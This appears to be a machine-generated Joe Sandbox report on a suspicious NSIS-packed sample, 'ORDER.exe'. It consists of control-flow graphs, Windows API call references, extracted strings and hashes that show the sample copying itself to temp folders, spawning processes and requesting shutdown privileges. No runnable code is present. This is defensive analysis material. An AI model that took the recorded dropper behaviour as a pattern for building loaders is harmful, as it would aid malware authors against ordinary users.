SetWindowLongA 5462->5463 5464 402892 5463->5464 5465 401a31 5466 4029e0 18 API calls 5465->5466 5467 401a37 5466->5467 5468 4029e0 18 API calls 5467->5468 5469 4019e1 5468->5469 4158 401e32 4159 4029fd 18 API calls 4158->4159 4160 401e38 4159->4160 4161 40501f 25 API calls 4160->4161 4162 401e42 4161->4162 4173 4054e5 CreateProcessA 4162->4173 4164 401e9e CloseHandle 4166 402663 4164->4166 4165 401e67 WaitForSingleObject 4167 401e48 4165->4167 4168 401e75 GetExitCodeProcess 4165->4168 4167->4164 4167->4165 4167->4166 4176 40609a 4167->4176 4170 401e87 4168->4170 4171 401e90 4168->4171 4180 405c94 wsprintfA 4170->4180 4171->4164 4174 405524 4173->4174 4175 405518 CloseHandle 4173->4175 4174->4167 4175->4174 4177 4060b7 PeekMessageA 4176->4177 4178 4060c7 4177->4178 4179 4060ad DispatchMessageA 4177->4179 4178->4165 4179->4177 4180->4171 4190 4015b3 4191 4029fd 18 API calls 4190->4191 4192 4015ba 4191->4192 4208 40585f CharNextA CharNextA 4192->4208 4194 4015c2 4195 40160a 4194->4195 4196 4057f1 CharNextA 4194->4196 4197 401638 4195->4197 4198 40160f 4195->4198 4199 4015d0 CreateDirectoryA 4196->4199 4203 401423 25 API calls 4197->4203 4200 401423 25 API calls 4198->4200 4199->4194 4201 4015e5 GetLastError 4199->4201 4202 401616 4200->4202 4201->4194 4204 4015f2 GetFileAttributesA 4201->4204 4214 405d36 lstrcpynA 4202->4214 4207 401630 4203->4207 4204->4194 4206 401621 SetCurrentDirectoryA 4206->4207 4209 40587a 4208->4209 4211 40588a 4208->4211 4209->4211 4212 405885 CharNextA 4209->4212 4210 4058aa 4210->4194 4211->4210 4213 4057f1 CharNextA 4211->4213 4212->4210 4213->4211 4214->4206 5470 4026b3 5490 4059c7 GetFileAttributesA CreateFileA 5470->5490 5472 4026ba 5473 402763 5472->5473 5474 4026c6 GlobalAlloc 5472->5474 5477 40276b DeleteFileA 5473->5477 5478 40277e 5473->5478 5475 40275a CloseHandle 5474->5475 5476 4026df 5474->5476 5475->5473 5491 4031cc SetFilePointer 5476->5491 5477->5478 5480 4026e5 5481 4031b6 ReadFile 5480->5481 5482 4026ee GlobalAlloc 5481->5482 5483 402732 WriteFile GlobalFree 5482->5483 5484 4026fe 5482->5484 5486 402f1f 46 API calls 5483->5486 5485 402f1f 46 API calls 5484->5485 5489 40270b 5485->5489 5487 402757 5486->5487 5487->5475 5488 402729 GlobalFree 5488->5483 5489->5488 5490->5472 5491->5480 5492 404135 5493 40414b 5492->5493 5498 404257 5492->5498 5496 403fec 19 API calls 5493->5496 5494 4042c6 5495 40439a 5494->5495 5497 4042d0 GetDlgItem 5494->5497 5503 404053 8 API calls 5495->5503 5499 4041a1 5496->5499 5500 4042e6 5497->5500 5501 404358 5497->5501 5498->5494 5498->5495 5502 40429b GetDlgItem SendMessageA 5498->5502 5504 403fec 19 API calls 5499->5504 5500->5501 5508 40430c 6 API calls 5500->5508 5501->5495 5509 40436a 5501->5509 5523 40400e KiUserCallbackDispatcher 5502->5523 5506 404395 5503->5506 5507 4041ae CheckDlgButton 5504->5507 5521 40400e KiUserCallbackDispatcher 5507->5521 5508->5501 5512 404370 SendMessageA 5509->5512 5513 404381 5509->5513 5510 4042c1 5515 4043bf SendMessageA 5510->5515 5512->5513 5513->5506 5514 404387 SendMessageA 5513->5514 5514->5506 5515->5494 5516 4041cc GetDlgItem 5522 404021 SendMessageA 5516->5522 5518 4041e2 SendMessageA 5519 404200 GetSysColor 5518->5519 5520 404209 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5518->5520 5519->5520 5520->5506 5521->5516 5522->5518 5523->5510 4224 402036 4225 4029fd 18 API calls 4224->4225 4226 40203d 4225->4226 4227 4029fd 18 API calls 4226->4227 4228 402047 4227->4228 4229 4029fd 18 API calls 4228->4229 4230 402051 4229->4230 4231 4029fd 18 API calls 4230->4231 4232 40205b 4231->4232 4233 4029fd 18 API calls 4232->4233 4234 402064 4233->4234 4235 40207a CoCreateInstance 4234->4235 4236 4029fd 18 API calls 4234->4236 4239 402099 4235->4239 4240 40214d 4235->4240 4236->4235 4237 401423 25 API calls 4238 402181 4237->4238 4239->4240 4241 40212f MultiByteToWideChar 4239->4241 4240->4237 4240->4238 4241->4240 5524 4014b7 5525 4014bd 5524->5525 5526 401389 2 API calls 5525->5526 5527 4014c5 5526->5527 5528 401bb8 5529 4029e0 18 API calls 5528->5529 5530 401bbf 5529->5530 5531 4029e0 18 API calls 5530->5531 5532 401bc9 5531->5532 5533 401bd9 5532->5533 5534 4029fd 18 API calls 5532->5534 5535 401be9 5533->5535 5538 4029fd 18 API calls 5533->5538 5534->5533 5536 401bf4 5535->5536 5537 401c38 5535->5537 5539 4029e0 18 API calls 5536->5539 5540 4029fd 18 API calls 5537->5540 5538->5535 5541 401bf9 5539->5541 5542 401c3d 5540->5542 5543 4029e0 18 API calls 5541->5543 5544 4029fd 18 API calls 5542->5544 5545 401c02 5543->5545 5546 401c46 FindWindowExA 5544->5546 5547 401c28 SendMessageA 5545->5547 5548 401c0a SendMessageTimeoutA 5545->5548 5549 401c64 5546->5549 5547->5549 5548->5549 4759 40243a 4770 402b07 4759->4770 4761 402444 4762 4029e0 18 API calls 4761->4762 4763 40244d 4762->4763 4764 402457 4763->4764 4767 402663 4763->4767 4765 402470 RegEnumValueA 4764->4765 4766 402464 RegEnumKeyA 4764->4766 4765->4767 4768 402489 RegCloseKey 4765->4768 4766->4768 4768->4767 4771 4029fd 18 API calls 4770->4771 4772 402b20 4771->4772 4773 402b2e RegOpenKeyExA 4772->4773 4773->4761 4774 40223b 4775 402243 4774->4775 4776 402249 4774->4776 4777 4029fd 18 API calls 4775->4777 4778 4029fd 18 API calls 4776->4778 4781 402259 4776->4781 4777->4776 4778->4781 4779 4029fd 18 API calls 4782 402267 4779->4782 4780 4029fd 18 API calls 4783 402270 WritePrivateProfileStringA 4780->4783 4781->4779 4781->4782 4782->4780 4858 40173f 4859 4029fd 18 API calls 4858->4859 4860 401746 4859->4860 4861 401764 4860->4861 4862 40176c 4860->4862 4897 405d36 lstrcpynA 4861->4897 4898 405d36 lstrcpynA 4862->4898 4865 40176a 4869 405fa1 5 API calls 4865->4869 4866 401777 4867 4057c6 3 API calls 4866->4867 4868 40177d lstrcatA 4867->4868 4868->4865 4889 401789 4869->4889 4870 40603a 2 API calls 4870->4889 4871 4059a2 2 API calls 4871->4889 4873 4017a0 CompareFileTime 4873->4889 4874 401864 4876 40501f 25 API calls 4874->4876 4875 40183b 4877 40501f 25 API calls 4875->4877 4885 401850 4875->4885 4879 40186e 4876->4879 4877->4885 4878 405d36 lstrcpynA 4878->4889 4880 402f1f 46 API calls 4879->4880 4881 401881 4880->4881 4882 401895 SetFileTime 4881->4882 4883 4018a7 CloseHandle 4881->4883 4882->4883 4883->4885 4886 4018b8 4883->4886 4884 405d58 18 API calls 4884->4889 4887 4018d0 4886->4887 4888 4018bd 4886->4888 4891 405d58 18 API calls 4887->4891 4890 405d58 18 API calls 4888->4890 4889->4870 4889->4871 4889->4873 4889->4874 4889->4875 4889->4878 4889->4884 4892 40554a MessageBoxIndirectA 4889->4892 4896 4059c7 GetFileAttributesA CreateFileA 4889->4896 4893 4018c5 lstrcatA 4890->4893 4894 4018d8 4891->4894 4892->4889 4893->4894 4895 40554a MessageBoxIndirectA 4894->4895 4895->4885 4896->4889 4897->4865 4898->4866 5550 40163f 5551 4029fd 18 API calls 5550->5551 5552 401645 5551->5552 5553 40603a 2 API calls 5552->5553 5554 40164b 5553->5554 5555 40193f 5556 4029e0 18 API calls 5555->5556 5557 401946 5556->5557 5558 4029e0 18 API calls 5557->5558 5559 401950 5558->5559 5560 4029fd 18 API calls 5559->5560 5561 401959 5560->5561 5562 40196c lstrlenA 5561->5562 5563 4019a7 5561->5563 5564 401976 5562->5564 5564->5563 5568 405d36 lstrcpynA 5564->5568 5566 401990 5566->5563 5567 40199d lstrlenA 5566->5567 5567->5563 5568->5566

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 406061 SHGetFileInfoA call 405d36 GetCommandLineA call 405d36 GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 4057f1 CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 14 4032d9-4032dd 12->14 15 4032df-4032e7 12->15 16 4033b1-4033cb GetTempPathA call 4031e3 13->16 14->14 14->15 17 4032e9-4032ea 15->17 18 4032ef-4032f2 15->18 26 403423-40343d DeleteFileA call 402c79 16->26 27 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 16->27 17->18 20 403384-403391 call 4057f1 18->20 21 4032f8-4032fc 18->21 20->11 36 403393 20->36 24 403314-403341 21->24 25 4032fe-403304 21->25 32 403343-403349 24->32 33 403354-403382 24->33 30 403306-403308 25->30 31 40330a 25->31 41 4034d1-4034e0 call 403695 OleUninitialize 26->41 42 403443-403449 26->42 27->26 44 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 27->44 30->24 30->31 31->24 38 40334b-40334d 32->38 39 40334f 32->39 33->20 35 4033a0-4033ac call 405d36 33->35 35->16 36->11 38->33 38->39 39->33 55 4034e6-4034f6 call 40554a ExitProcess 41->55 56 4035da-4035e0 41->56 46 4034c1-4034c8 call 403787 42->46 47 40344b-403456 call 4057f1 42->47 44->26 44->41 53 4034cd 46->53 59 403458-403481 47->59 60 40348c-403496 47->60 53->41 57 4035e6-403603 call 406061 * 3 56->57 58 40367d-403685 56->58 89 403605-403607 57->89 90 40364d-40365b call 406061 57->90 62 403687 58->62 63 40368b-40368f ExitProcess 58->63 65 403483-403485 59->65 66 403498-4034a5 call 4058b4 60->66 67 4034fc-403516 lstrcatA lstrcmpiA 60->67 62->63 65->60 70 403487-40348a 65->70 66->41 77 4034a7-4034bd call 405d36 * 2 66->77 67->41 72 403518-40352d CreateDirectoryA SetCurrentDirectoryA 67->72 70->60 70->65 73 40353a-403562 call 405d36 72->73 74 40352f-403535 call 405d36 72->74 85 403568-403584 call 405d58 DeleteFileA 73->85 74->73 77->46 95 4035c5-4035cc 85->95 96 403586-403596 CopyFileA 85->96 89->90 94 403609-40360b 89->94 101 403669-403674 ExitWindowsEx 90->101 102 40365d-403667 90->102 94->90 98 40360d-40361f GetCurrentProcess 94->98 95->85 99 4035ce-4035d5 call 405bea 95->99 96->95 100 403598-4035b8 call 405bea call 405d58 call 4054e5 96->100 98->90 107 403621-403643 98->107 99->41 100->95 117 4035ba-4035c1 CloseHandle 100->117 101->58 106 403676-403678 call 40140b 101->106 102->101 102->106 106->58 107->90 117->95
                          APIs
                          • #17.COMCTL32 ref: 00403238
                          • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                          • OleInitialize.OLE32(00000000), ref: 0040324A
                            • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                            • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                            • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                          • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,?,00000000,00000009), ref: 00403272
                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                          • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ORDER.exe",00000000), ref: 0040329A
                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\ORDER.exe",00000020), ref: 004032C5
                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                          • DeleteFileA.KERNELBASE(1033), ref: 00403428
                          • OleUninitialize.OLE32(?), ref: 004034D6
                          • ExitProcess.KERNEL32 ref: 004034F6
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ORDER.exe",00000000,?), ref: 00403502
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                          • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,00424000,?), ref: 0040357A
                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\ORDER.exe,0041E8B8,?), ref: 0040358E
                          • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                          • GetCurrentProcess.KERNEL32(?,?,00000006,00000005,?), ref: 00403614
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                          • ExitProcess.KERNEL32 ref: 0040368F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                          • String ID: "$"C:\Users\user\Desktop\ORDER.exe"$1033$C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike$C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ORDER.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`K$w$~nsu.tmp
                          • API String ID: 4107622049-4274076000
                          • Opcode ID: a00b215820a1fa6a230efcb39fea29283eff6eac4ca07d0765cafeb017810fa6
                          • Instruction ID: 3d26bb40307c87b2cd60c260c775e6d0301d96a10e68b952128d49a18977981a
                          • Opcode Fuzzy Hash: a00b215820a1fa6a230efcb39fea29283eff6eac4ca07d0765cafeb017810fa6
                          • Instruction Fuzzy Hash: 85B107706082517AE721AF659D8DA2B3EACEB41706F04447FF541BA1E2C77C9E01CB6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 118 40515d-405179 119 405308-40530e 118->119 120 40517f-405246 GetDlgItem * 3 call 404021 call 4048bd GetClientRect GetSystemMetrics SendMessageA * 2 118->120 121 405310-405332 GetDlgItem CreateThread CloseHandle 119->121 122 405338-405344 119->122 138 405264-405267 120->138 139 405248-405262 SendMessageA * 2 120->139 121->122 125 405366-40536c 122->125 126 405346-40534c 122->126 130 4053c1-4053c4 125->130 131 40536e-405374 125->131 128 405387-40538e call 404053 126->128 129 40534e-405361 ShowWindow * 2 call 404021 126->129 142 405393-405397 128->142 129->125 130->128 133 4053c6-4053cc 130->133 135 405376-405382 call 403fc5 131->135 136 40539a-4053aa ShowWindow 131->136 133->128 140 4053ce-4053e1 SendMessageA 133->140 135->128 143 4053ba-4053bc call 403fc5 136->143 144 4053ac-4053b5 call 40501f 136->144 146 405277-40528e call 403fec 138->146 147 405269-405275 SendMessageA 138->147 139->138 148 4053e7-405413 CreatePopupMenu call 405d58 AppendMenuA 140->148 149 4054de-4054e0 140->149 143->130 144->143 157 405290-4052a4 ShowWindow 146->157 158 4052c4-4052e5 GetDlgItem SendMessageA 146->158 147->146 155 405415-405425 GetWindowRect 148->155 156 405428-40543e TrackPopupMenu 148->156 149->142 155->156 156->149 159 405444-40545e 156->159 160 4052b3 157->160 161 4052a6-4052b1 ShowWindow 157->161 158->149 162 4052eb-405303 SendMessageA * 2 158->162 163 405463-40547e SendMessageA 159->163 164 4052b9-4052bf call 404021 160->164 161->164 162->149 163->163 165 405480-4054a0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 164->158 167 4054a2-4054c2 SendMessageA 165->167 167->167 168 4054c4-4054d8 GlobalUnlock SetClipboardData CloseClipboard 167->168 168->149
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 004051BC
                          • GetDlgItem.USER32(?,000003EE), ref: 004051CB
                          • GetClientRect.USER32(?,?), ref: 00405208
                          • GetSystemMetrics.USER32(00000002), ref: 0040520F
                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405230
                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405241
                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405254
                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405262
                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405275
                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405297
                          • ShowWindow.USER32(?,?), ref: 004052AB
                          • GetDlgItem.USER32(?,000003EC), ref: 004052CC
                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052DC
                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052F5
                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405301
                          • GetDlgItem.USER32(?,000003F8), ref: 004051DA
                            • Part of subcall function 00404021: SendMessageA.USER32(?,?,?,00403E52), ref: 0040402F
                          • GetDlgItem.USER32(?,000003EC), ref: 0040531D
                          • CreateThread.KERNEL32(00000000,00000000,Function_000050F1,00000000), ref: 0040532B
                          • CloseHandle.KERNELBASE(00000000), ref: 00405332
                          • ShowWindow.USER32(00000000), ref: 00405355
                          • ShowWindow.USER32(?,?), ref: 0040535C
                          • ShowWindow.USER32(?), ref: 004053A2
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053D6
                          • CreatePopupMenu.USER32 ref: 004053E7
                          • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004053FC
                          • GetWindowRect.USER32(?,000000FF), ref: 0040541C
                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405435
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405471
                          • OpenClipboard.USER32(00000000), ref: 00405481
                          • EmptyClipboard.USER32 ref: 00405487
                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405490
                          • GlobalLock.KERNEL32(00000000), ref: 0040549A
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054AE
                          • GlobalUnlock.KERNEL32(00000000), ref: 004054C7
                          • SetClipboardData.USER32(?,00000000), ref: 004054D2
                          • CloseClipboard.USER32 ref: 004054D8
                          Strings
                          • Stvkonsekvenserne115 Setup: Installing, xrefs: 0040544D
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: Stvkonsekvenserne115 Setup: Installing
                          • API String ID: 590372296-147676709
                          • Opcode ID: ddce3f407c61e1ebc3cac1cca45d68d18475e72ad548d40fcbdeb08d48be2a44
                          • Instruction ID: 24acf85f457993e5d1a00f4a74fbc0a00d7f38a893508f9c9f1f5035b4e63235
                          • Opcode Fuzzy Hash: ddce3f407c61e1ebc3cac1cca45d68d18475e72ad548d40fcbdeb08d48be2a44
                          • Instruction Fuzzy Hash: 5FA15BB1900208BFDB219FA0DD89AAE7F79FB08355F10407AFA04B61A0C7B55E51DF69

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 414 405d58-405d63 415 405d65-405d74 414->415 416 405d76-405d8b 414->416 415->416 417 405d91-405d9c 416->417 418 405f7e-405f82 416->418 417->418 421 405da2-405da9 417->421 419 405f88-405f92 418->419 420 405dae-405db8 418->420 423 405f94-405f98 call 405d36 419->423 424 405f9d-405f9e 419->424 420->419 422 405dbe-405dc5 420->422 421->418 425 405f71 422->425 426 405dcb-405e00 422->426 423->424 428 405f73-405f79 425->428 429 405f7b-405f7d 425->429 430 405e06-405e11 GetVersion 426->430 431 405f1b-405f1e 426->431 428->418 429->418 432 405e13-405e17 430->432 433 405e2b 430->433 434 405f20-405f23 431->434 435 405f4e-405f51 431->435 432->433 436 405e19-405e1d 432->436 439 405e32-405e39 433->439 437 405f33-405f3f call 405d36 434->437 438 405f25-405f31 call 405c94 434->438 440 405f53-405f5a call 405d58 435->440 441 405f5f-405f6f lstrlenA 435->441 436->433 442 405e1f-405e23 436->442 452 405f44-405f4a 437->452 438->452 444 405e3b-405e3d 439->444 445 405e3e-405e40 439->445 440->441 441->418 442->433 448 405e25-405e29 442->448 444->445 450 405e42-405e5d call 405c1d 445->450 451 405e79-405e7c 445->451 448->439 460 405e62-405e65 450->460 453 405e8c-405e8f 451->453 454 405e7e-405e8a GetSystemDirectoryA 451->454 452->441 456 405f4c 452->456 458 405e91-405e9f GetWindowsDirectoryA 453->458 459 405ef9-405efb 453->459 457 405efd-405f00 454->457 461 405f13-405f19 call 405fa1 456->461 457->461 464 405f02-405f06 457->464 458->459 459->457 463 405ea1-405eab 459->463 460->464 465 405e6b-405e74 call 405d58 460->465 461->441 468 405ec5-405edb SHGetSpecialFolderLocation 463->468 469 405ead-405eb0 463->469 464->461 466 405f08-405f0e lstrcatA 464->466 465->457 466->461 473 405ef6 468->473 474 405edd-405ef4 SHGetPathFromIDListA CoTaskMemFree 468->474 469->468 472 405eb2-405eb9 469->472 475 405ec1-405ec3 472->475 473->459 474->457 474->473 475->457 475->468
                          APIs
                          • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000), ref: 00405E09
                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E84
                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E97
                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405ED3
                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405EE1
                          • CoTaskMemFree.OLE32(00000000), ref: 00405EEC
                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F0E
                          • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000), ref: 00405F60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 900638850-2434263207
                          • Opcode ID: 0d90defceccf7a3314d6588998510e1a0ef65c4c2f55f086f079bc5466073577
                          • Instruction ID: 9c0e267699f90c8e910d98bdf84d4b8f2614ab6024826f89c9d009b20b1e8bc4
                          • Opcode Fuzzy Hash: 0d90defceccf7a3314d6588998510e1a0ef65c4c2f55f086f079bc5466073577
                          • Instruction Fuzzy Hash: 10610571A04905ABDF215F64DC84B7B3BA8DB55304F10813BE641B62D1D33C4A42DF9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 676 4055f6-40561c call 4058b4 679 405635-40563c 676->679 680 40561e-405630 DeleteFileA 676->680 681 40563e-405640 679->681 682 40564f-40565f call 405d36 679->682 683 4057bf-4057c3 680->683 684 405646-405649 681->684 685 40576d-405772 681->685 689 405661-40566c lstrcatA 682->689 690 40566e-40566f call 40580d 682->690 684->682 684->685 685->683 688 405774-405777 685->688 691 405781-405789 call 40603a 688->691 692 405779-40577f 688->692 694 405674-405677 689->694 690->694 691->683 699 40578b-40579f call 4057c6 call 4055ae 691->699 692->683 697 405682-405688 lstrcatA 694->697 698 405679-405680 694->698 700 40568d-4056ab lstrlenA FindFirstFileA 697->700 698->697 698->700 715 4057a1-4057a4 699->715 716 4057b7-4057ba call 40501f 699->716 702 4056b1-4056c8 call 4057f1 700->702 703 405763-405767 700->703 710 4056d3-4056d6 702->710 711 4056ca-4056ce 702->711 703->685 705 405769 703->705 705->685 713 4056d8-4056dd 710->713 714 4056e9-4056f7 call 405d36 710->714 711->710 712 4056d0 711->712 712->710 717 405742-405754 FindNextFileA 713->717 718 4056df-4056e1 713->718 726 4056f9-405701 714->726 727 40570e-405719 call 4055ae 714->727 715->692 720 4057a6-4057b5 call 40501f call 405bea 715->720 716->683 717->702 724 40575a-40575d FindClose 717->724 718->714 722 4056e3-4056e7 718->722 720->683 722->714 722->717 724->703 726->717 729 405703-40570c call 4055f6 726->729 736 40573a-40573d call 40501f 727->736 737 40571b-40571e 727->737 729->717 736->717 738 405720-405730 call 40501f call 405bea 737->738 739 405732-405738 737->739 738->717 739->717
                          APIs
                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 0040561F
                          • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 00405667
                          • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 00405688
                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 0040568E
                          • FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 0040569F
                          • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040574C
                          • FindClose.KERNEL32(00000000), ref: 0040575D
                          Strings
